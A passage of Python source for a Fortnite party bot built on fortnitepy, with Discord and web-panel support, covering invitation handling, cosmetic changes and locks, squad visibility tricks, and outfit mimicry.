FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
try:
import asyncio
import copy
import datetime
import json
import logging
import os
import platform
import random
import re
import socket
import string
import sys
import time
import traceback
import unicodedata
import webbrowser
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor, as_completed
from functools import partial, wraps
from glob import glob
from threading import Thread, Timer
from typing import Any, Callable, List, Optional, Type, Union
except ModuleNotFoundError as e:
import traceback
print(traceback.format_exc())
import platform
print(f'Python {platform.python_version()}\n')
print('標準ライブラリの読み込みに失敗しました。Pythonのバージョンが間違っている可能性があります。Pythonの再インストールなどを試してみてください。問題が修正されない場合は\nTwitter @gomashio1596\nDiscord gomashio#4335\nこちらか\nhttps://discord.gg/NEnka5N\nDiscordのサーバーまでお願いします')
print('Failed to load basic library. Python version maybe wrong. Try reinstall Python. If the issue is not resolved, contact me\nTwitter @gomashio1596\nDiscord gomashio#4335\nor please join support Discord server\nhttps://discord.gg/NEnka5N')
sys.exit(1)
try:
import aiohttp
import discord
import fortnitepy
import jaconv
import requests
import sanic.exceptions
import sanic.response
from aioconsole import ainput
from crayons import cyan, green, magenta, red, yellow
from fortnitepy import ClientPartyMember, Enum
from jinja2 import Environment, FileSystemLoader
from sanic import Sanic
from sanic.request import Request
except ModuleNotFoundError as e:
print(traceback.format_exc())
print(f'Python {platform.python_version()}\n')
print('サードパーティーライブラリの読み込みに失敗しました。INSTALL.bat を実行してください。問題が修正されない場合は\nTwitter @gomashio1596\nDiscord gomashio#4335\nこちらか\nhttps://discord.gg/NEnka5N\nDiscordのサーバーまでお願いします')
print('Failed to load third party library. Please run INSTALL.bat. If the issue is not resolved, contact me\nTwitter @gomashio1596\nDiscord gomashio#4335\nor please join support Discord server\nhttps://discord.gg/NEnka5N')
sys.exit(1)
if sys.platform == 'win32':
asyncio.set_event_loop(asyncio.ProactorEventLoop())
else:
try:
import uvloop
except ModuleNotFoundError:
pass
else:
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
if True: #Classes
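# Party privacy presets mirroring the in-game options, from fully public
# down to invite-only private parties.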
class PartyPrivacy(Enum):
PUBLIC = {
'partyType': 'Public',
'inviteRestriction': 'AnyMember',
'onlyLeaderFriendsCanJoin': False,
'presencePermission': 'Anyone',
'invitePermission': 'Anyone',
'acceptingMembers': True,
}
FRIENDS_ALLOW_FRIENDS_OF_FRIENDS = {
'partyType': 'FriendsOnly',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': False,
'presencePermission': 'Anyone',
'invitePermission': 'Anyone',
'acceptingMembers': True,
}
FRIENDS = {
'partyType': 'FriendsOnly',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': True,
'presencePermission': 'Leader',
'invitePermission': 'Leader',
'acceptingMembers': False,
}
PRIVATE_ALLOW_FRIENDS_OF_FRIENDS = {
'partyType': 'Private',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': False,
'presencePermission': 'Noone',
'invitePermission': 'Anyone',
'acceptingMembers': False,
}
PRIVATE = {
'partyType': 'Private',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': True,
'presencePermission': 'Noone',
'invitePermission': 'Leader',
'acceptingMembers': False,
}
class bool_:
@classmethod
def create(cls, content: str) -> bool:
d = {"false": False, "true": True}
return d.get(content.lower(), False)
class bool_none:
@classmethod
def create(cls, content: str) -> bool:
d = {"false": False, "true": True, "none": None}
return d.get(content.lower(), False)
class select:
def __init__(self, content: List[dict]) -> None:
self.content = content
class Red:
pass
class FixRequired:
pass
class CanLinebreak:
pass
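# Cookie-based session handling for the Sanic web panel: 64-character
# random session ids with a 10 minute expiry window.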
class LoginManager:
def __init__(self) -> None:
self.id_len = 64
self.expire_time = datetime.timedelta(minutes=10)
self.expires = {}
self.cookie_key = "X-SessionId"
self.no_auth_handler_ = sanic.response.html("Unauthorized")
def generate_id(self, request: Request) -> str:
Id = "".join(random.choices(string.ascii_letters + string.digits, k=self.id_len))
while Id in self.expires.keys():
Id = "".join(random.choices(string.ascii_letters + string.digits, k=self.id_len))
return Id
def authenticated(self, request: Request) -> bool:
if not data["web"]["login_required"]:
return True
# A session is valid only while its id is known and has not yet expired
Id = request.cookies.get(self.cookie_key)
if not Id or Id not in self.expires:
return False
return datetime.datetime.utcnow() < self.expires[Id]
def login_user(self, request: Request, response: Type[sanic.response.BaseHTTPResponse]) -> None:
Id = self.generate_id(request)
response.cookies[self.cookie_key] = Id
self.expires[Id] = datetime.datetime.utcnow() + self.expire_time
def logout_user(self, request: Request, response: Type[sanic.response.BaseHTTPResponse]) -> None:
Id = request.cookies.get(self.cookie_key)
if Id:
del response.cookies[self.cookie_key]
# Forget the session so this id can no longer authenticate
self.expires.pop(Id, None)
def login_required(self, func: Callable):
@wraps(func)
def deco(*args: Any, **kwargs: Any):
request = args[0]
if self.authenticated(request):
return func(*args, **kwargs)
elif isinstance(self.no_auth_handler_, sanic.response.BaseHTTPResponse):
return self.no_auth_handler_
elif callable(self.no_auth_handler_):
return self.no_auth_handler_(*args, **kwargs)
return deco
def no_auth_handler(self, func: Callable):
if not asyncio.iscoroutinefunction(func):
raise ValueError("Function must be a coroutine")
self.no_auth_handler_ = func
@wraps(func)
def deco(*args: Any, **kwargs: Any):
return func(*args, **kwargs)
return deco
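# Thin adapters that make web-panel requests look like chat messages, so
# the same command handlers can serve Fortnite whispers, Discord and the
# web UI alike.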
class WebUser:
def __init__(self, sessionId: str) -> None:
self._id = sessionId
@property
def display_name(self) -> str:
return "WebUser"
@property
def id(self) -> str:
return self._id
class WebMessage:
def __init__(self, content: str, sessionId: str, client: fortnitepy.Client) -> None:
self._sessionId = sessionId
self._content = content
self._client = client
self._author = WebUser(self._sessionId)
self._messages = []
@property
def author(self) -> WebUser:
return self._author
@property
def content(self) -> str:
return self._content
@property
def client(self) -> fortnitepy.Client:
return self._client
@property
def result(self) -> list:
return self._messages
def reply(self, content: str) -> None:
self._messages.append(content)
class AllMessage:
def __init__(self,
content: str,
author: Union[fortnitepy.user.UserBase, discord.abc.User, WebUser],
client: fortnitepy.Client,
base: Union[fortnitepy.message.MessageBase, discord.Message, WebMessage]
) -> None:
self._content = content
self._author = author
self._client = client
self._base = base
self._messages = {}
@property
def author(self) -> Union[fortnitepy.user.UserBase, discord.abc.User, WebUser]:
return self._author
@property
def content(self) -> str:
return self._content
@property
def client(self) -> fortnitepy.Client:
return self._client
@property
def base(self) -> Union[fortnitepy.message.MessageBase, discord.Message, WebMessage]:
return self._base
@property
def result(self) -> dict:
return self._messages
def reply(self, content: str, client: fortnitepy.Client) -> None:
if not self._messages.get(client.user.id):
self._messages[client.user.id] = []
self._messages[client.user.id].append(content)
class CanBeMultiple:
pass
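# fortnitepy.Client subclass driving one bot account; per-account switches
# (chat toggles, cosmetic locks, mimic settings, invite/friend policies)
# are seeded from the global config dict at construction time.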
class Client(fortnitepy.Client):
def __init__(self, emote: str, **kwargs: Any) -> None:
self.email = email
self.status_ = data['fortnite']['status']
self.eid = emote
self.boot_time = None
self.booted_utc = None
self.isready = False
self.booting = False
self.timer = None
self.acceptinvite_interval = True
self.stopcheck = False
self.outfitlock = False
self.backpacklock = False
self.pickaxelock = False
self.emotelock = False
self.owner = []
self.prevmessage = {}
self.select = {}
self.visual_members = []
self.invitelist = []
self.whisper = data['fortnite']['whisper']
self.partychat = data['fortnite']['partychat']
self.discord = data['discord']['discord']
self.web = data['web']['web']
self.whisperperfect = data['fortnite']['disablewhisperperfectly']
self.partychatperfect = data['fortnite']['disablepartychatperfectly']
self.discordperfect = data['discord']['disablediscordperfectly']
self.joinmessageenable = data['fortnite']['joinmessageenable']
self.randommessageenable = data['fortnite']['randommessageenable']
self.outfitmimic = data['fortnite']['outfitmimic']
self.backpackmimic = data['fortnite']['backpackmimic']
self.pickaxemimic = data['fortnite']['pickaxemimic']
self.emotemimic = data['fortnite']['emotemimic']
self.outfitlock = data['fortnite']['outfitlock']
self.backpacklock = data['fortnite']['backpacklock']
self.pickaxelock = data['fortnite']['pickaxelock']
self.emotelock = data['fortnite']['emotelock']
self.acceptinvite = data['fortnite']['acceptinvite']
self.acceptfriend = data['fortnite']['acceptfriend']
super().__init__(**kwargs)
def get_cache_user(self, user: str) -> Optional[fortnitepy.User]:
if self.is_id(user):
users = {i.id: i for i in cache_users.values()}
else:
users = cache_users
return users.get(user)
def add_cache(self, user: fortnitepy.user.UserBase) -> None:
try:
if isinstance(user, fortnitepy.user.UserBase) and user.id:
if isinstance(user, fortnitepy.User):
if user.display_name:
cache_users[user.display_name] = user
else:
user = self.get_user(user.id)
if user and user.display_name:
cache_users[user.display_name] = user
except Exception:
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
def inviteaccept(self) -> None:
send(name(self.user),l("inviteaccept"),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
self.acceptinvite = True
def inviteinterval(self) -> None:
send(name(self.user),l("inviteinterval"),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
self.acceptinvite_interval = True
def lock_check(self, author_id: str) -> bool:
if author_id in [client.user.id for client in loadedclients]:
return False
elif author_id in [owner.id for owner in self.owner]:
return False
elif data['fortnite']['whitelist-ignorelock'] and author_id in whitelist:
return False
elif author_id in [owner.id for owner in dclient.owner]:
return False
elif data['discord']['whitelist-ignorelock'] and author_id in whitelist_:
return False
return True
def is_most(self) -> Optional[str]:
name = self.user.display_name
member_joined_at_most = [self.user.id, getattr(getattr(self.party,"me",None),"joined_at",datetime.datetime.now())]
for member_ in self.party.members:
self.add_cache(member_)
if member_.id in [i.user.id for i in loadedclients]:
if member_.id != self.user.id:
name += f"/{str(member_.display_name)}"
if member_.joined_at < member_joined_at_most[1]:
member_joined_at_most = [member_.id, getattr(member_, "joined_at", datetime.datetime.now())]
if self.user.id == member_joined_at_most[0]:
return name
return None
def get_client_data(self) -> defaultdict:
var = defaultdict(lambda: None)
if not self.isready:
return var
party = getattr(self,"party",None)
if party:
config = party.config
var.update(
{
"party_id": party.id,
"party_size": party.member_count,
"party_max_size": config["max_size"]
}
)
var.update(
{
"friend_count": len(self.friends),
"pending_count": len(self.pending_friends),
"incoming_pending_count": len(self.incoming_pending_friends),
"outgoing_pending_count": len(self.outgoing_pending_friends),
"block_count": len(self.blocked_users),
"display_name": self.user.display_name,
"id": self.user.id,
"boot_time": int(time.time() - self.boot_time),
"client": self,
"whitelist": whitelist,
"whitelist_": whitelist_,
"blacklist": blacklist,
"blacklist_": blacklist_
}
)
return var
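# Snapshot of per-account stats (party size, friend/pending/block counts,
# uptime) used to fill the placeholders in the status template.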
async def change_status(self) -> None:
var = defaultdict(lambda: None)
var.update(self.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_incoming_pending_count": sum([len(client_.incoming_pending_friends) for client_ in clients]),
"all_outgoing_pending_count": sum([len(client_.outgoing_pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients])
}
)
if data['discord']['enabled'] and dclient.isready:
var.update(
{
"guild_count": len(dclient.guilds),
"get_guild_member_count": get_guild_member_count,
"dclient": dclient
}
)
party = getattr(self,"party",None)
if party:
status = eval_format(self.status_,var)
self.status = status
status = self.party.construct_presence(status)
try:
await self.send_presence(status)
except Exception:
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
status = eval_format(self.status_,var)
self.status = status
try:
await self.send_presence(status)
except Exception:
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def status_loop(self) -> None:
while True:
try:
await self.change_status()
except Exception:
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await asyncio.sleep(30)
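# Invitation handling below: accept, or decline with a reason-specific
# whisper (interval cooldown, owner-only mode, whitelist mode), mirroring
# each outcome to the console log.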
async def invitation_accept(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
try:
await invitation.accept()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_already_member_of_party"))
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(name(self.user),l("already_member_of_party"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.NotFound:
if data['ingame-error']:
await invitation.sender.send(l("user_notfound"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("user_notfound"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.Forbidden:
if data['ingame-error']:
await invitation.sender.send(l("error_private_party"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_private_party"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_accepting_partyinvite"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_while_accepting_partyinvite"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
self.acceptinvite_interval = False
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['fortnite']['inviteinterval']:
try:
self.timer.cancel()
except Exception:
pass
self.acceptinvite_interval = False
self.timer = Timer(data['fortnite']['interval'], self.inviteinterval)
self.timer.start()
if data['loglevel'] == 'normal':
send(name(self.user),l("accepted_invite_from", name(invitation.sender)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(name(self.user),f'{l("accepted_invite_from2", f"{name(invitation.sender)} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id)}',add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def invitation_decline(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_from", str(invitation.sender.display_name)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_from2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def invitation_decline_interval(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
await invitation.sender.send(l("declined_invite_interval3", str(data["fortnite"]["interval"])))
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_interval", str(invitation.sender.display_name), str(data["fortnite"]["interval"])),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_interval2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id, str(data["fortnite"]["interval"])),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def invitation_decline_owner(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
await invitation.sender.send(l("declined_invite_owner3"))
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_owner", str(invitation.sender.display_name)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_owner2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def invitation_decline_whitelist(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
await invitation.sender.send(l("declined_invite_whitelist3"))
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_whitelist", str(invitation.sender.display_name)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_whitelist2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
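# change_asset applies a cosmetic (outfit, back bling, pet, pickaxe, emote,
# emoticon or toy) unless the matching lock blocks this author; it returns
# False when the change was rejected by a lock.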
async def change_asset(self, author_id: str, type_: str, id_: str, variants: Optional[list] = None, enlightenment: Optional[Union[tuple, list]] = None, corruption: Optional[float] = None) -> bool:
# Copy into a fresh list: a shared mutable default would leak variants
# between calls, since the code below extends this list in place
variants = list(variants) if variants else []
if not enlightenment:
enlightenment = None
if type_ == "Outfit":
if self.outfitlock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants += self.party.me.create_variants(item="AthenaCharacter", profile_banner='ProfileBanner')
if not variants:
variants = None
await self.party.me.edit_and_keep(partial(self.party.me.set_outfit, asset=id_, variants=variants, enlightenment=enlightenment, corruption=corruption))
try:
if data['fortnite']['avatar_id'] == "{bot}":
self.set_avatar(fortnitepy.Avatar(asset=self.party.me.outfit, background_colors=data['fortnite']['avatar_color']))
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif type_ == "Back Bling":
if self.backpacklock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants += self.party.me.create_variants(item="AthenaBackpack", profile_banner='ProfileBanner')
await self.party.me.edit_and_keep(partial(self.party.me.set_backpack, asset=id_, variants=variants, enlightenment=enlightenment, corruption=corruption))
elif type_ == "Pet":
if self.backpacklock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants += self.party.me.create_variants(item="AthenaBackpack", profile_banner='ProfileBanner')
await self.party.me.edit_and_keep(partial(self.party.me.set_pet, asset=id_, variants=variants))
elif type_ == "Harvesting Tool":
if self.pickaxelock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants += self.party.me.create_variants(item="AthenaPickaxe", profile_banner='ProfileBanner')
await self.party.me.edit_and_keep(partial(self.party.me.set_pickaxe, asset=id_, variants=variants))
await self.party.me.set_emote("EID_IceKing")
elif type_ == "Emote":
if self.emotelock and self.lock_check(author_id):
return False
else:
if member_asset(self.party.me, "emote") and member_asset(self.party.me, "emote").lower() == id_.lower():
await self.party.me.clear_emote()
if "holidaycracker" in id_.lower():
if id_ != '' and '.' not in id_:
id_ = ("AthenaDanceItemDefinition'/Game/Athena/Items/"
"Cosmetics/Dances/HolidayCracker/{0}.{0}'".format(id_))
await self.party.me.set_emote(asset=id_)
self.eid = id_
elif id_.lower().endswith("papayacomms"):
if id_ != '' and '.' not in id_:
id_ = ("AthenaDanceItemDefinition'/Game/Athena/Items/"
"Cosmetics/Dances/PapayaComms/{0}.{0}'".format(id_))
await self.party.me.set_emote(asset=id_)
self.eid = id_
else:
await self.party.me.set_emote(asset=id_)
self.eid = id_
elif type_ == "Emoticon":
if self.emotelock and self.lock_check(author_id):
return False
else:
if member_asset(self.party.me, "emote") and member_asset(self.party.me, "emote").lower() == id_.lower():
await self.party.me.clear_emote()
id_ = f"/Game/Athena/Items/Cosmetics/Dances/Emoji/{id_}.{id_}"
await self.party.me.set_emote(asset=id_)
self.eid = id_
elif type_ == "Toy":
if self.emotelock and self.lock_check(author_id):
return False
else:
if member_asset(self.party.me, "emote") and member_asset(self.party.me, "emote").lower() == id_.lower():
await self.party.me.clear_emote()
id_ = f"/Game/Athena/Items/Cosmetics/Toys/{id_}.{id_}"
await self.party.me.set_emote(asset=id_)
self.eid = id_
return True
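# A usage sketch (the cosmetic IDs below are illustrative placeholders, and
# `client` stands for a ready instance of this class): a locked type returns
# False when the caller fails lock_check, otherwise the asset is applied and
# True is returned.
#
#   await client.change_asset(author_id, "Outfit", "CID_XXX_Athena_Commando_F")
#   await client.change_asset(author_id, "Emote", "EID_Floss")
#   # Emoticon and Toy IDs are expanded to full asset paths before set_emote().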
async def disable_voice(self) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
prop = self.party.meta.set_voicechat_implementation('None')
await self.party.patch(updated=prop)
async def enable_voice(self) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
prop = self.party.meta.set_voicechat_implementation('VivoxVoiceChat')
await self.party.patch(updated=prop)
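# A minimal sketch, assuming the bot currently leads the party: both helpers
# rewrite the party meta's voice chat implementation and patch the party, so
# they raise fortnitepy.Forbidden when the bot is not the leader.
#
#   if client.party.me.leader:
#       await client.disable_voice()  # implementation -> 'None'
#       await client.enable_voice()   # implementation -> 'VivoxVoiceChat'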
async def hide(self, member_id: Optional[str] = None) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
real_members = self.party.meta.squad_assignments
if not member_id:
num = 0
squad_assignments = [{"memberId": self.user.id, "absoluteMemberIdx": num}]
num += 1
if data['fortnite']['show-owner']:
for owner in self.owner:
if self.party.get_member(owner.id):
squad_assignments.append({"memberId": owner.id, "absoluteMemberIdx": num})
num += 1
if data['fortnite']['show-whitelist']:
for whitelistuser in whitelist:
if self.party.get_member(whitelistuser):
squad_assignments.append({"memberId": whitelistuser, "absoluteMemberIdx": num})
num += 1
if data['fortnite']['show-bot']:
for botuser in (otherbotlist + [i.user.id for i in loadedclients]):
if self.party.get_member(botuser):
squad_assignments.append({"memberId": botuser, "absoluteMemberIdx": num})
num += 1
else:
member = self.party.get_member(member_id)
if not member:
raise fortnitepy.NotFound("This member is not a part of this party.")
squad_assignments = self.visual_members
for squad in squad_assignments:
if squad["memberId"] == member.id:
squad_assignments.remove(squad)
self.visual_members = squad_assignments
prop = self.party.meta.set_squad_assignments(squad_assignments)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
async def show(self, member_id: Optional[str] = None) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
real_members = self.party.meta.squad_assignments
if not member_id:
member_indexes = [member.position for member in self.party.members if isinstance(member.position,int)]
available_indexes = [num for num in range(15) if num not in member_indexes]
num = 0
squad_assignments = []
for member in self.party.members:
if isinstance(member.position,int):
squad_assignments.append(
{
"memberId": member.id,
"absoluteMemberIdx": member.position
}
)
else:
squad_assignments.append(
{
"memberId": member.id,
"absoluteMemberIdx": available_indexes[num]
}
)
num += 1
else:
squad_assignments = self.visual_members
squad_members = [member["memberId"] for member in squad_assignments]
member_indexes = [member["absoluteMemberIdx"] for member in squad_assignments]
available_indexes = [num for num in range(15) if num not in member_indexes]
member = self.party.get_member(member_id)
if not member:
raise fortnitepy.NotFound("This member is not a part of this party.")
if member.id not in squad_members:
squad_assignments.append({"memberId": member.id, "absoluteMemberIdx": available_indexes[0]})
self.visual_members = squad_assignments
prop = self.party.meta.set_squad_assignments(squad_assignments)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
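# Sketch of the visual-squad trick shared by hide()/show(): a reduced
# squad_assignments list is patched to the party so hidden members vanish
# from the lobby UI, then the real assignments are restored locally so the
# bot's own state stays consistent. `client` and the member id are
# placeholders.
#
#   await client.hide()              # hide everyone except configured exceptions
#   await client.hide("<member-id>") # hide a single member
#   await client.show()              # rebuild the full visible member list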
async def party_member_outfit_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.outfitmimic,bool) and self.outfitmimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.outfitmimic,str) and member.id == self.outfitmimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"outfit"):
send(display_name_,f"CID: {member_asset(member,'outfit')}")
if flag:
if not member_asset(member,"outfit"):
try:
await self.change_asset(self.user.id, "Outfit", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
await self.change_asset(self.user.id, "Outfit", member_asset(member,"outfit"), member.outfit_variants, member.enlightenments, member.corruption)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def party_member_backpack_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.backpackmimic,bool) and self.backpackmimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.backpackmimic,str) and member.id == self.backpackmimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"backpack"):
send(display_name_,f"BID: {member_asset(member,'backpack')}")
if flag:
if not member_asset(member,"backpack"):
try:
await self.change_asset(self.user.id, "Back Bling", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
type_ = convert_to_type(member_asset(member,'backpack'))
await self.change_asset(self.user.id, type_, member_asset(member,"backpack"), member.backpack_variants, member.enlightenments, member.corruption)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def party_member_pickaxe_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.pickaxemimic,bool) and self.pickaxemimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
